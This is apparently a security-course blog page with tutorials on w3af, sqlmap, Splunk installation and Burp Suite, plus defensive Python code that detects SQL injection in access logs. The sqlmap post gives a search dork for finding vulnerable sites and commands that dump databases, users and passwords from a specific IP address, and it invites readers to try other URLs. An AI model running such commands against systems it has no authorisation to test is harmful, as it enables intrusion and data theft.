Posts in Blog

W3af

July 1st, 2019 Posted by Blog, Members Only 0 thoughts on “W3af”

It is important to always run security tests, and we think we should create our own tools. But many tools created by other people can make our checks easier, and one of them is w3af.

What is w3af?

w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to help you secure your web applications by finding and exploiting all web application vulnerabilities.

What can we do?

  1. Exploiting Web application vulnerabilities
  2. Scan REST APIs
  3. Web Application Payloads
  4. Metasploit integration

Installation

git clone https://github.com/andresriancho/w3af.git

cd w3af/
./w3af_console
. /tmp/w3af_dependency_install.sh

How is it used?

Command to start the console:

./w3af_console

Most of what you can use from the terminal has this help command:

help

w3af contains a series of utilities that support the process of discovering and exploiting vulnerabilities. All of these utilities are located in <W3AF_DIR>/tools.

gencc

Generate valid credit card numbers

cd tools
ls

./gencc -t mastercard

./gencc -t visa16

urldecode

Decodes a given URL; often used to turn URL-encoded strings into plain ASCII text.

./urldecode -d http%3A%2F%2Flocalhost%2Fw3af

Resources:

docs.w3af.org

If you are interested in learning more, we invite you to review this course.

Python For InfoSec Professionals

SQLMAP

June 20th, 2019 Posted by Blog, Members Only 0 thoughts on “SQLMAP”

For all developers, programmers, and ethical hackers, it is essential to always protect your data and the data that is hosted on the network. This is why sqlmap exists: it is a tool developed in Python that performs SQL injection automatically. Its objective is to detect and take advantage of SQL injection vulnerabilities in web applications. The tool has a powerful detection engine, many features for the penetration tester, and a wide range of switches that go from fingerprinting the database, through retrieving data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

sqlmap supports various database engines, such as MySQL, Oracle, PostgreSQL, Microsoft SQL Server, SQLite, Firebird, Sybase, and SAP MaxDB.

Among the main features of this tool is excellent support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries, and out-of-band.
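From the defender's side, several of these techniques leave recognizable traces in web server access logs. The following is an added example, not code from the original post or from the sqlmap project: it classifies access-log lines by technique and flags the scanner's User-Agent. The regular expressions, the log lines and the client IPs are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# One illustrative pattern per technique named above; these are assumptions of
# this example, not rules taken from sqlmap or from any detection product.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
    "time-based blind": re.compile(r"waitfor\s+delay|\b(?:pg_)?sleep\s*\(", re.I),
    "error-based": re.compile(r"\b(?:extractvalue|updatexml)\s*\(", re.I),
    "UNION query": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "stacked queries": re.compile(r";\s*(?:select|insert|update|delete|drop|exec|waitfor)\b", re.I),
    "out-of-band": re.compile(r"\b(?:xp_dirtree|utl_http|load_file)\b", re.I),
}
SCANNER_UA = re.compile(r"sqlmap/", re.I)  # client-controlled, so never the only check
# Combined log format: ip - - [time] "METHOD url PROTO" status size "referer" "agent"
LOG_LINE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) [^"]*" \d+ \S+ "[^"]*" "([^"]*)"')

# Constructed sample lines (documentation IP ranges, made-up sizes and times).
SAMPLE_LOG = [
    '198.51.100.7 - - [20/Jun/2019:10:00:01 +0000] "GET /bookdetail.aspx?id=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [20/Jun/2019:10:00:05 +0000] "GET /bookdetail.aspx?id=2%20AND%207421%3D7421 HTTP/1.1" 200 5120 "-" "sqlmap/1.3.6#stable (http://sqlmap.org)"',
    '203.0.113.9 - - [20/Jun/2019:10:00:06 +0000] "GET /bookdetail.aspx?id=2%20UNION%20ALL%20SELECT%20NULL%2CNULL HTTP/1.1" 200 310 "-" "sqlmap/1.3.6#stable (http://sqlmap.org)"',
    '203.0.113.9 - - [20/Jun/2019:10:00:09 +0000] "GET /bookdetail.aspx?id=2%3BWAITFOR%20DELAY%20%270%3A0%3A5%27 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

def classify(line):
    """Return (client_ip, findings) for one access-log line."""
    m = LOG_LINE.match(line)
    if not m:
        return None, []
    ip, url, agent = m.groups()
    query = unquote_plus(url.partition("?")[2])  # decode %xx and + before matching
    hits = [name for name, rx in SIGNATURES.items() if rx.search(query)]
    if SCANNER_UA.match(agent):
        hits.append("sqlmap user-agent")
    return ip, hits

def summarize(lines):
    """Map each client IP to the set of findings seen across its requests."""
    report = {}
    for line in lines:
        ip, hits = classify(line)
        if hits:
            report.setdefault(ip, set()).update(hits)
    return report

if __name__ == "__main__":
    for ip, hits in summarize(SAMPLE_LOG).items():
        print(ip, sorted(hits))
```

The last sample line shows why payload patterns matter more than the User-Agent check: the request carries a time-based payload but presents a browser-like agent string.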

This tool has many functionalities and features. It also supports downloading and uploading files from and to the file system underlying the database server when the database software is MySQL, PostgreSQL or Microsoft SQL Server.

When running sqlmap, there is a straightforward way to find a website with a generic vulnerability: place the following in the search engine of your choice, such as Google: section.php? Id = which results in all the fragile web pages.

How is it used?

Installation

sudo apt-get install sqlmap

or

pip install sqlmap

sqlmap

sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" -b

sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" --current-user

sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" --current-db

other tests

sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp --tables
sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T BOOKMASTER --columns
sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T sysdiagrams --columns
sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T BOOKMASTER --columns --dump
sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T sysdiagrams --columns --dump
sqlmap -u "http://45.77.162.239/bookdetail.aspx?id=2" --users --passwords

I recommend that you test with other URLs and analyze the results.

Resources:

http://sqlmap.org/

If you are interested in learning more, we invite you to review this course.

Python For InfoSec Professionals

Installing Splunk on the Ubuntu VM

May 12th, 2019 Posted by Blog, Members Only 0 thoughts on “Installing Splunk on the Ubuntu VM”

If you are one of those people who like topics related to ethical hacking, then Splunk is part of your list of tools. In this blog post we will tell you how you can install it.

You can go to the following link to download Ubuntu and create your own virtual machine.

https://www.ubuntu.com/download

 

The first step to start using Splunk in the Ubuntu VM is to download the .deb file. To do this we use the wget command to download the file directly from the official website. It should look like this:

wget -c -O splunklight.deb \
'https://www.splunk.com/bin/splunk/DownloadsActivityServlet?architecture=x86_64&platform=linux&version=6.5.0&product=splunk_light&filename=splunklight-6.5.0-59c8927def0f-linux-2.6-amd64.deb&wget=true'

Once you’ve downloaded the .deb file, upload the file to your Ubuntu server and place it in a temporary directory.

After that, we can use the following commands to apply any updates that our system may require to run Splunk without problems:

sudo $(which iptables) -F && \
sudo apt-get update && \
sudo apt-get upgrade -y

After that, run the dpkg command to install the Splunk server. The filename of the .deb file may change as new versions are made available, so make sure that you use the name of the file you downloaded.

sudo dpkg -i splunklight.deb

The log that appears at the end of the unpacking is caused by a previous version of Splunk on the system; it shouldn’t cause trouble while installing Splunk. Next, we need to create the init.d script so that we can quickly start and stop Splunk.

Change to the default Splunk directory and run the executable file with the commands shown below:

cd /opt/splunk/bin/
sudo ./splunk enable boot-start

Once you have applied these commands, you can press SPACE to view all of the license agreement and then press Y to accept it.

Use the service command shown below to start Splunk:

sudo service splunk start

Now that you have started Splunk, point your browser at http://localhost:8000/ (as a recommendation, it is better to access another website before engaging the Splunk GUI). Open the URL in the browser and log in with the details below:

User Name: admin

Password: changeme

You now have your Splunk installation up and running. What’s required next is to get data from your various applications, logs, and monitoring tools into Splunk.

Now that we have these statistics, the next step is to import them into another platform for visualization purposes. We recommend reading on through the next module, which explains how to download, install and configure the Splunk Forwarder.

Resources:

https://www.splunk.com/

If you are interested in learning more about Splunk, we invite you to review this course.

Advanced Threat Hunting With Splunk


Burp Suite

May 11th, 2019 Posted by Blog, Members Only 0 thoughts on “Burp Suite”

Welcome to the introductory tutorial to Burp Suite. It provides details about the installation and usage of Burp Suite. Burp Suite is an essential tool for bug hunters and web application pentesters.

Installing Java

In Ubuntu open the terminal then run:

sudo add-apt-repository ppa:webupd8team/java

sudo apt-get update

sudo apt-get install oracle-java8-installer

Install Foxyproxy

Foxyproxy for Firefox

Download links are:

Click on Foxyproxy’s icon and click “Options”:

Click “Add new proxy”. In the “Proxy details” section → “Manual Proxy Configuration”, insert the following values for Server and Port:

  • Server: 127.0.0.1
  • Port: 8080

In the “General” section, give the proxy a name and select a color. Then save.

Now start the proxy you just created by right-clicking on the Foxyproxy icon and selecting the newly created proxy.

Burp Suite – How To

Starting Up Burp Suite

Double-click on Burp executable to start it. On Linux double-click the jar file or download the plain jar file, and run it from the terminal:

java -jar burpsuite_community_v1.7.33.jar

Note: your download may have a different version number.

Start Burp Suite with default settings.

Proxy

The proxy intercepts requests from the web browser. Requests can be modified in real time or can also be viewed in connection with their responses in the “HTTP history” tab.

Click “Proxy” > “Intercept” > “Intercept On”; this makes Burp stop each request for interception.

When a page is opened in the web browser while “Intercept is on” is enabled, Burp displays the request sent from your browser and holds it until you press “Forward”. Until then, the request is not forwarded to the web application server, so no response is received: we can see the web browser waiting for a response, since Burp Suite has not yet sent the request.

If intercept is on and you do not want to send the request forward, click “Drop”; the request will not be sent to the destination. “Drop” also lets you inspect the request and then discard it once you are done. For example, a request is intercepted when you click the “submit” button on the target site; you can make it available in Repeater via “Action” → “Send to Repeater” and then click “Drop”.

Proxy Options

To see the proxy settings, click “Proxy” → “Options”.

As you can see the default port used by Burp for its proxy is port 8080. Choose the same for Foxyproxy. You can have multiple proxies; you need to make sure that the ports in Burp and Foxyproxy match.

To conclude:

The Foxy Proxy configuration (IP: 127.0.0.1, Port: 1337) must be the same as the configuration in Burp Proxy (IP: 127.0.0.1, Port: 1337). The communication works as follows:

  • The target site is browsed by the user;
  • Foxy Proxy and Burp are configured with the same IP and Port as explained above;
  • Foxy Proxy is on; then Burp Proxy is on;
  • Every request made by the user is sent by Foxy Proxy to the configured proxy IP and port (in this case Burp’s proxy);
  • The request intercepted by Burp Proxy is stored in the HTTP history;
  • Concurrently, Burp also forwards the request to the destination web application server and waits for a reply;
  • Once the web server sends back a response, Burp forwards the response to the browser.

Foxy Proxy ensures that all the initiated requests are sent to Burp’s Proxy.
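The request flow listed above, reduced to a loopback example (added here, not code from the original post or from Burp Suite): a stand-in origin server, a plain-HTTP forward proxy that records each request in a history list, and a client that sends its request to the proxy's IP and port. The class names, the /login path and the OS-assigned ports are assumptions of this example.

```python
import http.client
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

HISTORY = []  # (method, url, status) per request, in the spirit of "HTTP history"

class Quiet(BaseHTTPRequestHandler):
    def log_message(self, *args):  # keep the console clean
        pass

    def reply(self, status, body):
        self.send_response(status)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

class Origin(Quiet):
    """Stand-in for the destination web application server."""
    def do_GET(self):
        self.reply(200, b"hello from origin")

class Proxy(Quiet):
    """Forward proxy: self.path is the absolute URL a proxied client sends."""
    def do_GET(self):
        direct = urllib.request.build_opener(urllib.request.ProxyHandler({}))
        with direct.open(self.path, timeout=5) as upstream:  # forward and wait
            status, body = upstream.status, upstream.read()
        HISTORY.append((self.command, self.path, status))  # store in history
        self.reply(status, body)  # relay the response to the client

def serve(handler):
    server = HTTPServer(("127.0.0.1", 0), handler)  # port 0: OS picks a free port
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server

def demo():
    HISTORY.clear()
    origin, proxy = serve(Origin), serve(Proxy)
    url = "http://127.0.0.1:%d/login" % origin.server_port
    # The "browser" connects to the proxy's IP and port, never to the origin.
    conn = http.client.HTTPConnection("127.0.0.1", proxy.server_port, timeout=5)
    conn.request("GET", url)
    body = conn.getresponse().read()
    origin.shutdown()
    proxy.shutdown()
    return body, list(HISTORY)
```

Calling demo() returns the origin's response body together with the single history entry the proxy recorded. If the client pointed at a port where no proxy listens, the connection would be refused, which is the failure a Foxy Proxy and Burp port mismatch produces.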

Resources:

https://portswigger.net/burp

If you are interested in learning more, we invite you to review this course.

Burp Suite Workshop
